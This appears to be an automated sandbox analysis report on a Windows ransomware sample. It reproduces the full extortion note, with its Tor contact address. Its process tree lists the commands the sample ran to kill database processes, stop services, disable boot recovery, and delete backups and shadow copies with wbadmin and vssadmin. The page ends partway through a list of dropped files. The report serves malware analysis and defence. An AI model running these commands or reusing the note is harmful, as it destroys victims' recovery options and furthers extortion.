Analysis

  • max time kernel
    151s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    13-10-2023 14:03

General

  • Target

    IN.exe

  • Size

    340KB

  • MD5

    714870c33ba84e744b84b32e6e114ed9

  • SHA1

    840f442d4466713becdf72b88846871330ac38e7

  • SHA256

    51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51

  • SHA512

    270c584cc9f696de3421429627a07bfbd7829a033cfdc16280e7e233e8ae09e2f1cd0341537a6b050811683d93a14a1465aa3ab96e9577c98ebea521faae65f2

  • SSDEEP

    6144:PNs9prB0CnszdPZxMzk1ukSXa9bnuDOeFdGpBP7ENf3zcfUE:y9RaPZxMzk1uBXa9bu2JeAfUE

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (7545) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1288
      • C:\Users\Admin\AppData\Local\Temp\IN.exe
        "C:\Users\Admin\AppData\Local\Temp\IN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2080
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
            4⤵
              PID:1212
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2228
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2800
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2272
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2736
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2680
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2540
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1584
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2564
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2512
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2532
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3064
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2576
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
              PID:2500
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
                4⤵
                  PID:2504
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im sqlceip.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1396
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
                3⤵
                  PID:2964
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
                    4⤵
                      PID:852
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im fdlauncher.exe
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2708
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                    3⤵
                      PID:2844
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                        4⤵
                          PID:1704
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -im Ssms.exe
                            5⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1672
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                        3⤵
                          PID:1420
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                            4⤵
                              PID:2924
                              • C:\Windows\system32\taskkill.exe
                                taskkill -f -im SQLAGENT.EXE
                                5⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2820
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                            3⤵
                              PID:524
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                                4⤵
                                  PID:268
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill -f -im fdhost.exe
                                    5⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:472
                              • C:\Windows\SysWOW64\cmd.exe
                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                                3⤵
                                  PID:1708
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                                    4⤵
                                      PID:1380
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill -f -im ReportingServicesService.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1164
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                                    3⤵
                                      PID:2332
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                                        4⤵
                                          PID:2904
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill -f -im msftesql.exe
                                            5⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2944
                                      • C:\Windows\SysWOW64\cmd.exe
                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                                        3⤵
                                          PID:1240
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                                            4⤵
                                              PID:584
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill -f -im pg_ctl.exe
                                                5⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1060
                                          • C:\Windows\SysWOW64\cmd.exe
                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                            3⤵
                                              PID:1720
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                                4⤵
                                                  PID:1752
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill -f -impostgres.exe
                                                    5⤵
                                                    • Kills process with taskkill
                                                    PID:2092
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                                3⤵
                                                  PID:2140
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                                    4⤵
                                                      PID:2060
                                                      • C:\Windows\system32\net.exe
                                                        net stop MSSQLServerADHelper100
                                                        5⤵
                                                          PID:1676
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                                            6⤵
                                                              PID:1464
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                                        3⤵
                                                          PID:1460
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                                            4⤵
                                                              PID:548
                                                              • C:\Windows\system32\net.exe
                                                                net stop MSSQL$ISARS
                                                                5⤵
                                                                  PID:2164
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop MSSQL$ISARS
                                                                    6⤵
                                                                      PID:1816
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                                3⤵
                                                                  PID:1048
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                                    4⤵
                                                                      PID:2024
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop MSSQL$MSFW
                                                                        5⤵
                                                                          PID:240
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop MSSQL$MSFW
                                                                            6⤵
                                                                              PID:396
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                                        3⤵
                                                                          PID:1528
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                                            4⤵
                                                                              PID:2112
                                                                              • C:\Windows\system32\net.exe
                                                                                net stop SQLAgent$ISARS
                                                                                5⤵
                                                                                  PID:2280
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                                                    6⤵
                                                                                      PID:704
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                                3⤵
                                                                                  PID:2408
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                                    4⤵
                                                                                      PID:1820
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net stop SQLAgent$MSFW
                                                                                        5⤵
                                                                                          PID:1700
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                                            6⤵
                                                                                              PID:1556
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                                                        3⤵
                                                                                          PID:1552
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                                                            4⤵
                                                                                              PID:1760
                                                                                              • C:\Windows\system32\net.exe
                                                                                                net stop SQLBrowser
                                                                                                5⤵
                                                                                                  PID:1236
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 stop SQLBrowser
                                                                                                    6⤵
                                                                                                      PID:1624
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                                3⤵
                                                                                                  PID:944
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                                    4⤵
                                                                                                      PID:2344
                                                                                                      • C:\Windows\system32\net.exe
                                                                                                        net stop REportServer$ISARS
                                                                                                        5⤵
                                                                                                          PID:804
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 stop REportServer$ISARS
                                                                                                            6⤵
                                                                                                              PID:1952
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                                                        3⤵
                                                                                                          PID:812
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                                                            4⤵
                                                                                                              PID:2104
                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                net stop SQLWriter
                                                                                                                5⤵
                                                                                                                  PID:1568
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop SQLWriter
                                                                                                                    6⤵
                                                                                                                      PID:580
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                3⤵
                                                                                                                  PID:2220
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                    4⤵
                                                                                                                      PID:2476
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                        5⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:1136
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                    3⤵
                                                                                                                      PID:2292
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                        4⤵
                                                                                                                          PID:2444
                                                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                                                            bcdedit.exe /set {default} recoverynabled No
                                                                                                                            5⤵
                                                                                                                            • Modifies boot configuration data using bcdedit
                                                                                                                            PID:1652
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                        3⤵
                                                                                                                          PID:1936
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                            4⤵
                                                                                                                              PID:2796
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                            3⤵
                                                                                                                              PID:1944
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                                4⤵
                                                                                                                                  PID:2016
                                                                                                                                  • C:\Windows\system32\wbadmin.exe
                                                                                                                                    wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                                    5⤵
                                                                                                                                      PID:2368
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                  3⤵
                                                                                                                                    PID:1744
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                      4⤵
                                                                                                                                        PID:1604
                                                                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                                                                          wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                          5⤵
                                                                                                                                          • Deletes System State backups
                                                                                                                                          PID:2688
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                      3⤵
                                                                                                                                        PID:2300
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                          4⤵
                                                                                                                                            PID:308
                                                                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                                                                              wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                              5⤵
                                                                                                                                              • Deletes system backups
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              PID:2236
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                          3⤵
                                                                                                                                            PID:692
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                              4⤵
                                                                                                                                                PID:1068
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                                  5⤵
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:1392
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IN.exe
                                                                                                                                            \\?\C:\Users\Admin\AppData\Local\Temp\IN.exe -network
                                                                                                                                            2⤵
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            • System policy modification
                                                                                                                                            PID:1956
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic.exe SHADOWCOPY /nointeractive
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3004
                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2036

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          48452522857b81bf9b83755d38ef5e26

                                                                                                                                          SHA1

                                                                                                                                          fc3a10874957587e1af69238824e3768fdb19817

                                                                                                                                          SHA256

                                                                                                                                          22f5f633aa2cd31220742d59aada5fcb19e055ccbc4c26b10d95797f39db918e

                                                                                                                                          SHA512

                                                                                                                                          d87557b0ab2442f6ddc687a8c6a196c5adc115864624da6c40cff03d5e4a66e15bffdfe943403202612242cd820feb0da125a99f84dcd1e6abb2a5af71fdf128

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          199478f663af48df9ec6ae188c1cc172

                                                                                                                                          SHA1

                                                                                                                                          82e15a4ef733271315e2df4ac9fc9268a2aa8c62

                                                                                                                                          SHA256

                                                                                                                                          d0887138e3ba84af7096f3045c06b6c7b9b574622cf7723dc1d03440f4559afd

                                                                                                                                          SHA512

                                                                                                                                          2ae6ac62e0b7ee9b1ee066894582df84ec1b7daaa3d670a5038f33dbcd6a9f6ada654f050df96af694e16b81d91f76631d0a59b237318371a580c4e37542538f

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          e5b0db35d56400f48188c95b55da3798

                                                                                                                                          SHA1

                                                                                                                                          33acb2ad5490a63b70ef713d6cec64e135de3a41

                                                                                                                                          SHA256

                                                                                                                                          c3876929b44f55509f773386b47c04425f037ce1cf47635411fab7759a5b6a49

                                                                                                                                          SHA512

                                                                                                                                          3f71875da4b8280062ff386eee52235b50d4e097e77ab5f8e14cbcb1173fce29e70865c3316817f9c7127f33c27ee7f79a8a621d67a96fe514b09e03c6cf190d

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          138e03605263af78e6eb831af5116052

                                                                                                                                          SHA1

                                                                                                                                          61d5141fae9e36f5bc62c02a3e0d0d906e61a13b

                                                                                                                                          SHA256

                                                                                                                                          fd4cc74be9d3637c05f6bfefe872b2054e17491b1df72a2649e8779888621f21

                                                                                                                                          SHA512

                                                                                                                                          9c9e589fc7b440f28ae175db0e08b151d45325edd1114a5bb3b7cc5e20bc065986ccd3d1fa97c935705e7224378719c5867525a456503592cfa7c1de50011ed6

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          36eefa9cb22dfdaf8dc49a89af19a26b

                                                                                                                                          SHA1

                                                                                                                                          fdfd3c03c0642cd19464fde9248c853c750f2dad

                                                                                                                                          SHA256

                                                                                                                                          1a18bf09aae35ed699a9ab6861683d2b7bcedbe6f05a9f95e8ebeac6a7e2b25c

                                                                                                                                          SHA512

                                                                                                                                          8f07df099e96217bc5522dc64c86a9f6a9b212b727352f907353fc8d78b5d3c78677d20715c14c249e79405b1462fcee964158440d9b556e69ddc17fc67beba1

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK.infected

                                                                                                                                          Filesize

                                                                                                                                          1KB

                                                                                                                                          MD5

                                                                                                                                          d7002f81474b154e6a004768cd01672f

                                                                                                                                          SHA1

                                                                                                                                          766a4cac87f480c78eebaa6ca1f182a72cc90c1e

                                                                                                                                          SHA256

                                                                                                                                          5a811812aa8ada0d647f87d99f596fa5bb20ff78fa2245d96bdc64cfcf44c202

                                                                                                                                          SHA512

                                                                                                                                          58178ba34c27a8ddee643fae29567eab96e1bc2f569885dc9bca9495a4bbf66b236e249cd6edbd4faa50fb6ee8bc190cf5f0c992eecc614ce94505385bc180fb

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

                                                                                                                                          Filesize

                                                                                                                                          240KB

                                                                                                                                          MD5

                                                                                                                                          4f3b20d78f1d35a400e107b99e91c6ef

                                                                                                                                          SHA1

                                                                                                                                          c69cbacd2bb58bdf18077b1daeaec2981741f63d

                                                                                                                                          SHA256

                                                                                                                                          fc295fabed69a0123c438ae3591ac6c2287f52fb973e8b0708afdd742d21644f

                                                                                                                                          SHA512

                                                                                                                                          83a4e88234099b87bc6c0d638bf3f1657d391306174639888618c529982dad174c40f30f6917d7e0dd2f834fd58dfc33c2fe0e3f5df47a2f2a52ac75b5e2212e

                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF

                                                                                                                                          Filesize

